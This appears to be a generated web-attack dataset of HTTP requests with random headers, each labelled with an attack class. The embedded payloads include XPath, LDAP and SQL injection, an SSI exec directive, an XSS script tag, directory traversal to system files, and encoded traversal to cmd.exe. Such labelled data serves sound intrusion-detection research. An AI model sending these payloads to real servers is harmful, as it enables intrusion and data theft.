Accept-Encoding: identity, compress;q=0.0, deflate;q=0.3, identity
Accept-Language: *;q=0.1
Cache-Control: mwrs='octepl'
Client-ip: 6.173.16.245
Cookie: 8hxnE0ccrT=0409;cecvsdxata=mUj_wnU9;lvoprgbe3r7g=")(targetfilter=(o=NetscapeRoot));weqk9=5;pbuujissrduocf=rEbeeasnseLtlYrr;RrVstyle=6396102
Cookie2: $Version="894"
Date: Sun, 11 May 08 24:36:18 UTC
ETag: W/"ZszLNnwcsJ1baB-TTfMt"
Expect: 100-continue
From: oNYgay5@hierdoNi.fr
If-Modified-Since: Fri, 22 Jul 05 21:31:13 CET
If-Unmodified-Since: Thu, 18 May 06 07:57:22 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 23 Feb 05 16:22:31 CET
Max-Forwards: 0775
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic Z3lzZWVycDplMGVibjA=
Authorization: Basic b3M1ZjpybU5ldHRmaA==
Range: -85,-288767
Referer: /pgd0yna.tiff
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: eihsrwtatp/3.6.5.1
UA-CPU: MIPS
UA-Disp: 732,386,8
UA-OS: Windows 95
UA-Pixels: 161x1713
Via: 5.3 www.nl7rlho.htm, ABaoe9/3.3 55.149.28.157
Transfer-Encoding: epdh
Upgrade: aoeac/3.0, iatoE/2.1, a6wo/3.8, e9e/4.3
Warning: 886 5.35.222.218 "heval7tanRnTas" "Mon, 03 Jul 06 13:38:22 UTC"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37458
Start - Id: 49062
class: XPathInjection
GET /h5qYr6xnw/LlrsHehaz4smppHy/eloatsllerUwTi/lK37cmd.exe?h7Aeoo4hh=aEtfehoati9eneoh&edbaou=n6tsekmgitne2cjce&e9oi4iai=eD&0a33homedocumenti=fC9n6sI7yl&a6e=%28i+%3C+count%28qriia%2Fchild%3A%3Atext%28%29%29+and++++j++++%3C+++++count%281i%2Fchild%3A%3Acomment%28%29%29+++and+++++k++%3C++++count%28dh%2Fchild%3A%3A*%29++++%29&39r=%27n&xtsttSh=544294&tfMPsxRCa=s3ue+5%26s%2FeUeybodyinclude0%40%40&uilosegagaie1d=rOjW2xh8V3h&oooNre4azgk=et&cagkvu40Cnr0ema=R3e&ehietnoyas=5868830&X5LkQhnx7GQ=tnea HTTP/1.0
Host: 76.105.129.199:21651
Connection: close
Accept: */*;q=0.7
Accept-Charset: us-ascii;q=0.8, cp-950;q=0.7, macintosh;q=0.5, euc-tw;q=0.0, windows-1253;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: geeryey-i;q=0.8
Cache-Control: l='l'
Client-ip: 164.173.183.167
Cookie: ishO=h;reha=oQ.YW5z1H;ooEjata1swaeudt=16
Cookie2: $Version="84"
Date: Tue, 16 Sep 08 18:12:02 GMT
ETag: W/"bj@Q8.9F_UsS-HtPu"
Expect: I3umu=lic0is
From: oT4sie@pMej.gov
If-Modified-Since: Thu, 17 Jul 08 17:54:01 GMT
If-Unmodified-Since: Sun, 04 Apr 10 15:25:35 UTC
If-Match: "qk.OLolgoCa@E-cV"
If-None-Match: "tVEDm1DEek3CZXbowu"
If-Range: "8WcuBMDm2pIipGgVD"
Max-Forwards: 55
MIME-Version: 0.7
Pragma: nd=7zo
Proxy-Authorization: NTLM Y3FhZWFobWFmYW5BaGRlZHRlb3Jhc2xhZTluR2xEdmxkVWNuaEl0ZW92cw==
Authorization: Basic OWhpZDphd3RocGVhNQ==
Range: -4,-1070,-459610
Referer: /oeRpoeU/sqoi/esenn6sm.sh
TE: chunked,deflate;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/8.7 (compatible; MSIE 6.5; Solaris; eearnctu)
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: HTTP/5.8 www.srpoanr.css, FTP/9.7 174.224.157.210:69912, 5.6 www.ash3ta.html
Transfer-Encoding: identity
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 712 141.86.56.222 "RenNkwhed" "Fri, 05 Oct 07 19:54:02 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49062
Start - Id: 48808
class: XPathInjection
GET /AqEZkhvar/nxmNaEV14Tr-X4@@y8Ai/hUqGkz/0X8YI/eumJPqJK2OEQxr-c4lM/sn6a3D/eeu3osel5e2mesYtthr/eF72eHqW9/7zP/aueqhom/7ls_B@HEJs@qz-I9/ylvKJqygqrdocumentlibM.php4?jA.jmailL=i8n&hhnraa0=adolwoOdr0an&VDYxhtacces3s=maEe%27++or++ad%2Fynadtr%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D040%5D+++++or+%2702rrn%27+%3D%27&vwkEnso=r%27rbe%2Bca1e&0oYj=hkWLp2Q3c&SxaeeetejRugef=f&bbyDve6weNrl=d5et&sKqtr5T@agws=ic&Xqg4QhtpassPE4U=324 HTTP/1.1
Host: www.5niveEi.biz
Connection: phnnltn
Accept: image/gif, application/zip;q=0.8
Accept-Charset: iso-8859-8;q=0.0, iso-8859-4
Accept-Encoding: *
Accept-Language: uoi-e, og-8e
Cache-Control: only-if-cached
Client-ip: 5.230.196.145
Cookie: eign3tsSaaaioon=144205;tfeit=nprtpst;ftpLMxqN=3848470118;Acp7nrdo1=u+/sAftpl
Cookie2: $Version="7"
Date: Tue, 10 Jun 08 06:03:03 CET
ETag: "VO5FnVJ6E4qjyUA"
Expect: 100-continue
From: 2geofch9@4eke.org
If-Modified-Since: Tue, 01 Apr 08 23:28:03 UTC
If-Unmodified-Since: Mon, 03 May 10 12:59:32 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3221
MIME-Version: 5.2
Pragma: he=L8bt
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Basic bVAzNmxPOmxsaWVz
Range: 5889-260241,53147-,8-96
Referer: /3221sat/seot9u.tar.gz
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: Mozilla/8.7 (Windows; U; Win98 6.5; es-ai; rv:6.8.4) Gecko/96784760
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: FTP/4.0 165.129.237.54:6, HTTP/0.1 36.39.48.24, 3.4 118.174.161.149
Transfer-Encoding: compress
Upgrade: 71emX/6.2, hao/6.3, scEf4/7.0
Warning: 989 42.33.152.171 "ej9c" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 9894674694471428
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48808
Start - Id: 37582
class: LdapInjection
PUT /mYDOQG5Q3IJDW.MUqL/t7b2llgPCFn5dFfo/cotnetl2qanixotf2/seKtsd4TAlaooku.msf? HTTP/1.1
Content-Length: 317
Content-Language: h
Content-Encoding: deflate
Content-Location: /uo3aO1r/a1rat/hulsPEH/owseeaar.pl
Content-MD5: c2FsRW9lRmNPYWFucHRpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Oct 04 05:20:42 CET
Last-Modified: Wed, 20 Oct 04 17:26:48 GMT
Host: 158.191.114.246
Connection: nenreso
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.7, isiri-3342;q=0.3, x-mac-japanese, ks_c_5601-1987;q=0.7, euc-kr
Accept-Encoding: identity;q=0.9, deflate;q=0.5
Accept-Language: rnNnr-rtdRatn;q=0.6, senc1Hag-u, 2hirec-tlsna, ide-EKsdOi, Dte-riM
Cache-Control: max-age=21357
Client-ip: 234.104.82.80
Cookie: bQYWx=Lll;uaLm15ulroyx=336821;mOotaznyo=0330942;h4ceelyf=418;mochalexeccAvRW=fsqe;trrsftt=nbooTdlodg
Cookie2: $Version="58"
Date: Wed, 04 Jun 08 06:58:08 CET
ETag: "My6Z1FxApjznUqx9Sx"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Wed, 03 May 06 10:47:08 CET
If-Unmodified-Since: Wed, 30 Jul 08 07:50:37 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Wed, 18 May 05 18:40:58 GMT
Max-Forwards: 60
MIME-Version: 7.0
Pragma: ePnze=eh
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: NTLM UnJueW5CZWhpemhwYWJzTmZjaDNvZWx5eXNyaGlocmVhdHRsZXRvY2NhZHRrcm8=
Range: 9-357
Referer: http://www.uEha.cz/rfr5Hwm/iTssn/hm0eOe/fh3oTr/Getqa.mspx
TE: chunked,deflate,chunked
Trailer: If-None-Match
User-Agent: Mozilla/5.1 (Windows; U; Windows NT 5.1; vl-eo; rv:6.8.9) Gecko/26077839
UA-CPU: PowerPC
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4454x553
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: gzip
Upgrade: artg/9.7, Boy/7.1, oiE/0.1, mladno/7.3, Ni9/4.6
Warning: 891 www.Senj6a.tiff "aiMu" "Wed, 07 Jun 06 17:57:47 CET"
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

awrl0wEsbf=735&mtS0t=e&wiltetdj1uiyml=3028&eRlor0=Aaetheew&&hDfJmls77=h1)(&(objectClass =  np*)&h3eeieeOet=HuthxnPt&ozZamewatiemln=d1hdnsn&@k35tahQd4G8=\aoty8oir&80qveonot=242659&t5=5AneaeRin&ugzanlhMahi=ar+3shtce&G5hTconnect686E=4lu&e0dmttn8amtotri=sebrer&fStiuE=hsnAaxnteohtio&scittmwUaanjm=167359

End - Id: 37582
Start - Id: 40233
class: SSI
GET /2bpeteml4e3Pyilet/tr1uNgZ6/sha2it3nesl.swf? HTTP/1.1
Host: www.eatheitm0.org
Connection: sejosed
Accept: audio/*, application/x-tar;q=0.5, application/*;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 201.49.47.11
Cookie2: $Version="36"
Date: Sat, 31 Jan 04 02:24:18 GMT
If-Modified-Since: Thu, 15 Jan 09 18:43:14 CET
If-Match: *
If-None-Match: *
Proxy-Authorization: NTLM Z3llakRyM3Vjcm42cnl0ZEh0bnRidnVuaHVvczBubG5ldHliZHVS
Range: 24419-8,26976-174670,50232-
Referer: http://esqeeawa.st/wgltm/tsrr/qpaour/Oadad/dtesiE.jpg
User-Agent: <!-- #exec  cmd="c:\progra~1\hs\q3tesh2\ecl.exe  d:\nin\www.nenaon.org\iqhgUg\database.mdb /x  exporttofoxpro"-->
Via: wy2/6.2 88.118.90.153, HTTP/7.7 65.254.229.79, 4.8 www.oEedeoht.gif
Upgrade: pat/5.1, n6ps/0.1, ofEr/6.7

null

End - Id: 40233
Start - Id: 46634
class: XSS
GET /agtecemaw0iojh52/9aY3vwOj/9QCI/ivLBZjTUK/mJlZAfgA3oCdgFq/ece1ifudfnsi10/as6ee/llsANJ_rls0aV/dpiren41etNlp/Ctlr.pl? HTTP/1.0
Host: www.knol.net
Connection: close
Accept: application/zip, audio/basic, video/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: <a   href   =    " about:<s&#99;ript    >[alert  ('aNen');]</script >   " >
Cache-Control: hi4dOlch=i
Client-ip: 219.150.217.95
Cookie: dect=rVMYTz;j1home7v4MmVtB=sf0h;ueiiTFcrOe=window.opentbin;hd=)ucopytt;cre=78708;l9hkkovrip=e6c e  -
Cookie2: $Version="5"
Date: Tue, 05 Jan 10 09:01:18 UTC
ETag: "14UmgyVJx4Sug6vrUA4w"
Expect: vetise=ab4eliOb
From: iuaea@cvOyle.it
If-Modified-Since: Sat, 11 Sep 04 14:29:32 UTC
If-Unmodified-Since: Wed, 13 Aug 08 08:17:41 CET
If-Match: "9_gE2eXT6c8DqWYc_5U"
If-None-Match: *
If-Range: Sat, 17 Mar 07 10:01:45 GMT
Max-Forwards: 8
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: Basic bnJ0bjpndEVmb24=
Range: 516737-,3-
Referer: /p0nTb/pacAepe/5gsisP/telWRO7.avi
TE: trailers,chunked,deflate;q=0.0
Trailer: Via
User-Agent: Mozilla/8.4 (X11; U; Open BSD i586 6.9; n2-op; rv:0.4.2) Gecko/18299069
UA-Pixels: 488x452
Via: 6.5 www.efei9art.tiff
Transfer-Encoding: identity
Upgrade: Ecza/9.5
X-Serial-Number: 4075489
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46634
Start - Id: 49161
class: XPathInjection
GET /Sgroup bydhoexnopt/an/r5g/tRedf7h/fd/dmasmm.tiff?fce5between=mr%27+++or+6++++%3C++++count%28path%2Fchild%3A%3A*%29+or++++%276oi%27+%3D%27 HTTP/1.1
Host: 215.20.144.254:8832
Connection: nnop
Accept: video/*;q=0.4
Accept-Charset: euc-jp;q=0.5, iso-8859-9;q=0.8, x-mac-cyrillic;q=0.0, gb2312
Accept-Encoding: 
Accept-Language: *
Cache-Control: owtjlwA='eape'
Client-ip: 38.175.250.11
Cookie: szbamtee9xiyfn7=3;tea8fnoztnjiOs=p s t;cnAn=567564;ld6wrm1foee=xtermrl
Cookie2: $Version="33"
Date: Mon, 28 Jun 04 21:20:39 CET
ETag: "3SucpQWcgXF39AiAf"
Expect: 100-continue
From: esgt1xrh@tidc.com
If-Modified-Since: Mon, 09 Feb 09 05:34:14 CET
If-Unmodified-Since: Sun, 20 Jul 08 21:57:27 GMT
If-Match: "0RYhKtFgl@DG.dlBDTr"
If-None-Match: "uLyRHl6Vyb3jBji5ZbXM"
If-Range: Wed, 16 May 07 15:04:46 GMT
Max-Forwards: 870
MIME-Version: 5.8
Pragma: yEweamfG='67'
Proxy-Authorization: Digest opaque="Mpzdea"
Authorization: ptad c8aietA=roddisd
Range: -441207,31726-,-3
Referer: /sosbqAao/e1ete/tc2edh.gif
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.9 (Windows; U; Win98 5.5; ra-mi; rv:7.1.3) Gecko/35681158
UA-CPU: StrongARM
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 290x3654
Via: 9.9 www.eere.htm, 7.2 www.kgnes.js
Transfer-Encoding: compress
Upgrade: rMm/8.7
Warning: 291 113.152.215.252 "6unhh" "Fri, 21 Oct 05 09:21:56 GMT"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 017399203750342
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49161
Start - Id: 44910
class: PathTransversal
GET /mdoaer9NlticmnoL/aoeapp/.GCHG563zGZlLmeta/atgNd/st9rcuk.php4?tpS6ym=..%2F..%2F..%2Fstngil%2Fadmin.txt HTTP/1.0
Host: 149.246.136.24
Connection: bwEy
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, compress, gzip;q=0.0
Accept-Language: rM-Htre5Dh;q=0.2, rotkt8f-t, eAtn-svA;q=0.0
Cache-Control: no-cache
Client-ip: 138.91.106.9
Cookie: onwbdas=7si;a5tau=amttqeceka3ahc;Ueai7in=37548;myeWcpse4=shEg Dh
Cookie2: $Version="2"
Date: Sun, 05 Jun 05 02:32:05 GMT
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: zttec7
From: ossdo1d@eovryuBei.be
If-Modified-Since: Sat, 17 Apr 04 24:24:40 CET
If-Unmodified-Since: Thu, 07 Oct 04 24:22:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 853
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: Basic aDdmQTpvdWFlb3Aw
Range: 50635-77
Referer: http://www.olinwve.biz/dgic4e/13imu/d2oes.mpeg
TE: trailers,gzip;q=0.5
Trailer: Range
User-Agent: Mozilla/3.3 (X11; U; Linux i386 0.5; YZ-86; rv:6.9.4) Gecko/71480671
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6797x3315
Via: 2.3 101.92.144.176:5, FTP/8.7 5.151.204.9, 6.7 73.104.9.237:8
Transfer-Encoding: compress
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 988 www.oihee.jpg:20 "etxoOiolmnofnnjob1c" "Mon, 09 Mar 09 19:24:20 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44910
Start - Id: 42566
class: SqlInjection
GET /7OGddrf1Qfm/7d2xcsC7/srlX@x8vsacNP/anvaozcdutsseosdszRl/OnOLgdic4ne/rm381MvpVldE/nrzendavnumhb1tbse6c/6BdvzPxyziqN-h/u58/4fiTldZc.jsp?emeee3uannc=3092127&rfjesetSxpomz=AHm3atet9ms4n&w68-ZWsam=dbhO%27%2F**%2FUNION%2F**%2FSELECT%2F**%2Fqiunit01p%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2Ftf%2F**%2Flike%2F**%2F%27%2525 HTTP/1.0
Host: 218.79.107.195:8
Connection: nplrt
Accept: text/*;q=0.8, image/jpeg
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.1, identity, gzip;q=0.9, deflate;q=0.0
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 58.68.40.65
Cookie: QotiEaOctra9dm=eZisZOD91FKC;H7u9oshensttn7=?t;qemo1toeont=23479614;6eterE=552
Cookie2: $Version="57"
Date: Fri, 10 Aug 07 17:56:52 CET
ETag: "AIbTkMC-@CHeNXLDldey"
Expect: shrot
From: tmTstilr@oerx.it
If-Modified-Since: Thu, 10 Jan 08 06:44:02 GMT
If-Unmodified-Since: Fri, 20 Jul 07 07:24:16 CET
If-Match: "ko-up2h_R5he46_b"
If-None-Match: "_KbjtWBMwwQAIu-xBqA"
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 423
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic b2VsbjY6T2hUZ2Vv
Authorization: feet elTus=lwzomle
Range: -05,8037-,228664-
Referer: http://www.tIdkNxE.ch/TBege/efidvn.jpg
TE: chunked,trailers,gzip;q=0.6
Trailer: Expect
User-Agent: Mozilla/3.6 (Machintosh; U; Mac OS X 2.0; h7-t2; rv:1.3.3) Gecko/11225049
UA-CPU: MIPS
UA-Disp: 4287,1140,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 161x8196
Via: HTTP/4.0 103.239.142.166, 3.9 www.ishtsra.jpg:12790
Transfer-Encoding: gzip
Upgrade: idlsll/7.2
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42566
Start - Id: 38324
class: LdapInjection
GET /emtnwi9hr1hiirny/ngD.PDO@gTjDSCr8oH/FNgTsexec_phpmO9/mUvuhSJyKJLqVXNo/ln/nw0clSave3rfitunmowr/er/6FC2U7aOGxi7l.7Pn/olvciiga3oASuhdximcT/y58cr8s50r7O-6M/eHnbr.htm?ir=%29%28%7C+%28displayName%3Dhad*%29++%28name++++%3D+had*++++%29%28+++mail%3Dhad*+++%29&hxStdoxelro=ltnL9MtH10k&t0nmunrna=1865&jtQolenlngyoham=26582066 HTTP/1.0
Host: 32.221.149.195:82310
Connection: close
Accept: text/*;q=0.0, text/xml, application/zip;q=0.0
Accept-Charset: windows-1250;q=0.6, iso-8859-9
Accept-Encoding: deflate;q=0.3, identity, identity
Accept-Language: riuvn-otir, at-W6e;q=0.8
Cache-Control: no-store
Client-ip: 26.169.24.36
Cookie: ru=8;tesseenehaldd=ocOKh
Cookie2: $Version="66"
Date: Thu, 14 May 09 08:23:43 GMT
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: atq5uIk=lcLmsuZ;i3ece4=Swd7rg
From: etae@mLte.st
If-Modified-Since: Wed, 14 Dec 05 15:52:48 CET
If-Unmodified-Since: Sat, 30 Jan 10 15:23:52 CET
If-Match: "_DaoADa4rUR2024s"
If-None-Match: *
If-Range: Sun, 17 Aug 08 10:34:36 GMT
Max-Forwards: 9782
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Digest qop=den0n
Range: -717,218781-
Referer: http://www.yNozaqh7.org/iyhpa/a1Ny/gWhm1t/htrgf/eyOxl2c.mpg
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.0 (Windows; U; Windows NT 8.5; su-ty; rv:7.1.4) Gecko/87038088
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6454x625
Via: ahc/4.2 98.75.232.168, 6.1 www.heon7.jpg
Transfer-Encoding: deflate
Upgrade: ipd8o/8.2, wrthnk/5.7, ntg/1.8, rtt/1.6
Warning: 900 78.163.243.190 "eegoi38hvlbccn" "Tue, 23 Aug 05 02:06:35 GMT"
X-Forwarded-For: 36.43.147.188
X-Serial-Number: 3515531846
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38324
Start - Id: 49964
class: XPathInjection
GET /s-@SNnQAaO71.a@y/et/geAn84xjsmz23iI8i6ed/oewjpJzq/d86Lxqrj44UxRgPlX6.html?sroari=egOBK8_&etbfEaTwfltezD=t%2F9wrim&wniEEsBnav=Otsa%2FNe%2Fine%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D791%5D+or+%27aesn1oeh%27+++%3D++%27&q5Hd5=fYCGAPeIA2&no=aooow&ni1hp=n%40u&eCl@VFkYgconnect=nsuiframe&eRala=f8Jk7bJqjAb&tenhteetthcljn=rrsSftpqlocationy HTTP/1.1
Host: 185.3.155.133
Connection: close
Accept: */*;q=0.9
Accept-Charset: euc-tw;q=0.0, cp-936, windows-1250;q=0.7, windows-1258;q=0.9, iso-8859-9
Accept-Encoding: *
Accept-Language: nVelxofo-j5ngh
Cache-Control: no-store
Client-ip: 48.67.50.33
Cookie: eng9munpCcs2ao=s9dhUNlhW;uTetCtczrn=084043
Cookie2: $Version="378"
Date: Sun, 17 Feb 08 04:03:14 GMT
ETag: W/"hQ4l.RD7dOpBmeEgodH"
Expect: 100-continue
From: jOaulrtZ@oAt2Eo.gov
If-Modified-Since: Tue, 06 Feb 07 11:19:53 UTC
If-Unmodified-Since: Tue, 02 Mar 04 01:13:48 UTC
If-Match: *
If-None-Match: "hvJIOvQz9xhA@2j0fp"
If-Range: *
Max-Forwards: 679
MIME-Version: 0.7
Pragma: wj='reioOri'
Proxy-Authorization: NTLM aGVuc2FudW9zb3VobmxhemVtdGl0NHN0ZXFraWE1ZWFkOHVpaUFkYWd0bnBlbHdv
Authorization: NTLM ZW50ZU9idGRtb295OW50eWFPeUp0MHRubXM3SHRzdXRic3Vybg==
Range: 73758-,-8229
Referer: /2oye/snai/beaile.cfm
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: Mozilla/2.1 (X11; U; Linux i586 0.5; i2-ez; rv:5.3.8) Gecko/45454700
UA-CPU: x86
UA-Disp: 5750,1984,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 207x5488
Via: 7.9 56.93.75.143
Transfer-Encoding: gzip
Upgrade: pennen/7.5
Warning: 631 www.reelek.js "sooCrilind" 
X-Forwarded-For: 199.10.120.226
X-Serial-Number: 595930508
----: -------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49964
Start - Id: 43840
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 170.221.117.5:49
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.1, identity;q=0.9, compress, gzip;q=0.5, compress;q=0.7
Accept-Language: ina4ah-dAu;q=0.3, ib-reSenovo;q=0.1, yeiunl-ih;q=0.5, oat-eal;q=0.6, vfwX-ireouwn
Cache-Control: only-if-cached
Client-ip: 34.114.34.166
Cookie: o3nra=H'o>%us5dakth
Cookie2: $Version="61"
Date: Sun, 23 Jan 05 22:31:20 UTC
ETag: "OgRXfIiZpYzKNFJj"
Expect: psttrke5
From: nxa0tn0@Cododus.net
If-Modified-Since: Tue, 27 Jan 09 24:06:23 CET
If-Unmodified-Since: Fri, 19 Jun 09 13:22:59 UTC
If-Match: "irp1IvVnJAT7@cT"
If-None-Match: "huLhkN8ZOfTwqzaX"
If-Range: Tue, 13 Mar 07 02:44:46 CET
Max-Forwards: 85
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest uri=/Ieiete.jpg
Authorization: r1ia5p rrcsdA=tttf
Range: 653-,494-99921,2-094773
Referer: /oett/aleteu1l.zip
TE: deflate
Trailer: Accept
User-Agent: Mozilla/5.6 (compatible; szaed; Windows NT; ploy0hhtn; mlsjtoi)
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6925x167
Via: 1.6 74.172.49.164:14
Transfer-Encoding: eoshG
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43840
Start - Id: 45335
class: PathTransversal
GET /iDa_qNY/FhE4P_UY/d6dtdr9EitAauEncwnz/sth0mvjmueetA/fand%uQNinB_/7XPK4dVKgxOLr7/iIwj9Wywt1XxkDPmg/lrUcAr0heioo1o8h.js?_Zexec@g=ptThnt+ HTTP/1.1
Host: 144.240.87.213
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-japanese;q=0.4, iso-8859-15
Accept-Encoding: deflate;q=0.3, gzip;q=0.6, compress, identity;q=0.2
Accept-Language: ub-a7;q=0.8
Cache-Control: no-store
Client-ip: 172.207.197.187
Cookie: oite5ti=n:\windows\boot.ini;t1iBskfWF10H=9201017;f0iad=tIEf6NvKhM0;mntFBy=sad
Date: Tue, 29 Nov 05 13:35:46 GMT
Expect: 100-continue
If-Modified-Since: Wed, 12 Jul 06 11:52:06 UTC
If-Unmodified-Since: Thu, 03 Jun 04 12:00:16 UTC
If-Match: *
If-None-Match: "Im.p_-lmfBwSe.b.O@bX"
If-Range: "kiYT_8Gxnan@_em.pp"
Max-Forwards: 0661
Pragma: ma=dodso
Proxy-Authorization: Basic RWFvc2k6c3JnSTM=
Authorization: 5il5 lkyioh=iasT2mro
Range: -916323,2-
Referer: http://www.hyry0anu.ch/rwuqorro/4osex/thtao/If02otmi/ixdusgh0.zip
TE: gzip,gzip;q=0.6
Trailer: If-Range
User-Agent: Mozilla/8.4 (Windows; U; Windows NT 9.2; ae-uS; rv:1.8.7) Gecko/15184172
UA-OS: Mac OS X
UA-Pixels: 785x0560
Via: HTTP/8.0 www.yt7oN.shtml, 5.0 www.qane.jpeg, 5.1 www.reqt.css
Transfer-Encoding: identity

null

End - Id: 45335
Start - Id: 43681
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 116.89.62.133
Connection: keep-alive
Accept: audio/basic, text/html
Accept-Charset: hz-gb-2312, iso-2022-jp, shift_jis;q=0.4
Accept-Encoding: compress;q=0.8
Accept-Language: n-yacskl, seanhuw-Dejna8hk;q=0.4
Cache-Control: only-if-cached
Client-ip: 10.124.19.16
Cookie: ailOuotew=b<styleda;objectr2Xmzmimgj=uhewep =1\hdas
Cookie2: $Version="617"
Date: Tue, 26 Jan 10 04:46:26 UTC
ETag: W/"S1TaRMTQKjjb-G6@X"
Expect: mhknea
From: o68nO@tetn70i.cz
If-Modified-Since: Wed, 27 Feb 08 19:17:13 UTC
If-Unmodified-Since: Sat, 21 Apr 07 01:00:44 UTC
If-Match: *
If-None-Match: "6FUvDFJhYCwcMuLU"
If-Range: *
Max-Forwards: 2
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="lieew"
Authorization: Digest algorithm=MD5
Range: 42-91,822939-,-31
Referer: http://eocAnmnV.fr/au8d/etlo/osht.jpeg
TE: trailers,chunked
User-Agent: epiu (sbkjvD; nHTGNyf; nyJpZ3; ns7@wHEX; hA3B@dxYlT)
UA-CPU: PowerPC
UA-Disp: 0760,6921,16
UA-Color: color16
UA-Pixels: 827x275
Via: FTP/5.1 187.32.105.226, tnlss/5.5 70.23.82.162
